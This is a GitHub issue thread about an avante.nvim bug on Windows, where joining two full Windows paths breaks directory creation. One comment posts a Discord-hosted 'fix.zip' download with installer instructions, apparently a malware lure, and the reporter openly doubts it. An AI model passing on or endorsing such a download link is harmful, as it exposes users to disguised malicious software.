### ISSUE TITLE
[Bug] We couldn't mkdir

### ISSUE THREAD

**Issue by pidgeon777** [yetone/avante.nvim#480]
`AvanteAsk` produces this error when submitting the prompt:

```log
E5108: Error executing lua: ...a/Local/nvim-data/lazy/plenary.nvim/lua/plenary/path.lua:505: We couldn't mkdir: C:\Users\UA50D~1.USR\AppData\Local\Temp\nvim/avante\C:
stack traceback:
  [C]: in function 'error'
  ...a/Local/nvim-data/lazy/plenary.nvim/lua/plenary/path.lua:505: in function 'mkdir'
  ...ata/Local/nvim-data/lazy/avante.nvim/lua/avante/path.lua:82: in function 'get'
  ...Data/Local/nvim-data/lazy/avante.nvim/lua/avante/llm.lua:59: in function 'stream'
  .../Local/nvim-data/lazy/avante.nvim/lua/avante/sidebar.lua:1260: in function 'handle_submit'
  .../Local/nvim-data/lazy/avante.nvim/lua/avante/sidebar.lua:1313: in function <.../Local/nvim-data/lazy/avante.nvim/lua/avante/sidebar.lua:1303>
```

My hypothesis is that there could be something wrong in this function:

```lua
-- Creates a directory in the cache path for the given buffer and copies the custom prompts to it.
-- We need to do this because the prompt template engine requires a specific directory to load all required files.
-- PERF: Instead of copying to cache, we could also load in the global context, but this requires some work on bindings. (eh maybe?)
---@param bufnr number
---@return string the resulting cache_directory to be loaded with avante_templates
N.get = function(bufnr)
  if not P.available() then error("Make sure to build avante (missing avante_templates)", 2) end

  -- Get root directory of the given bufnr
  local directory = Path:new(Utils.root.get({ buf = bufnr }))
  ---@cast directory Path
  ---@type Path
  local cache_prompt_dir = P.cache_path:joinpath(directory)
  if not cache_prompt_dir:exists() then cache_prompt_dir:mkdir({ parents = true }) end

  local scanner = Scan.scan_dir(directory:absolute(), { depth = 1, add_dirs = true })
  for _, entry in ipairs(scanner) do
    local file = Path:new(entry)
    if entry:find("planning") and N.templates.planning == nil then
      N.templates.planning = file:read()
    elseif entry:find("editing") and N.templates.editing == nil then
      N.templates.editing = file:read()
    elseif entry:find("suggesting") and N.templates.suggesting == nil then
      N.templates.suggesting = file:read()
    end
  end

  Path:new(debug.getinfo(1).source:match("@?(.*/)"):gsub("/lua/avante/path.lua$", "") .. "templates")
    :copy({ destination = cache_prompt_dir, recursive = true })

  vim.iter(N.templates):filter(function(_, v) return v ~= nil end):each(function(k, v)
    local f = cache_prompt_dir:joinpath(H.get_mode_file(k))
    f:write(v, "w")
  end)

  return cache_prompt_dir:absolute()
end
```

Once again, this issue might be due to how Windows and Unix-like systems handle file paths differently.

Also, it seems this function creates a bunch of files and directories, depending on the current cwd.

I am not sure if this is a desired behavior. Many users prefer to dedicate a specific cache folder for this kind of activity, where all necessary files can be created without cluttering other directories, especially project directories. My suggestion is to add an option that allows users to choose between:

- Creating a file and directory structure within a specific cache folder
- Maintaining the current behavior

Additionally, an option to completely disable the history functionality would be beneficial.

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by pidgeon777** [comment]
![image](https://github.com/user-attachments/assets/8e434973-d118-40b2-a008-ee9f056ad68a)

What the heck should that be?

**Comment by pidgeon777** [comment]
Paste the code in plain text here, thank you.

**Comment by aarnphm** [comment]
huh I thought Path from plenary.path already handle Windows path (i guess not).

**Comment by yuchanns** [comment]
> huh I thought Path from plenary.path already handle Windows path (i guess not).

The problem is the directory of buf is a full windows path, and you concat it with another windows path, which produces  something like `C:\path\to\temp\C:\path\to\buf`

**Comment by pidgeon777** [comment]
I confirm it is now solved. Thank you!
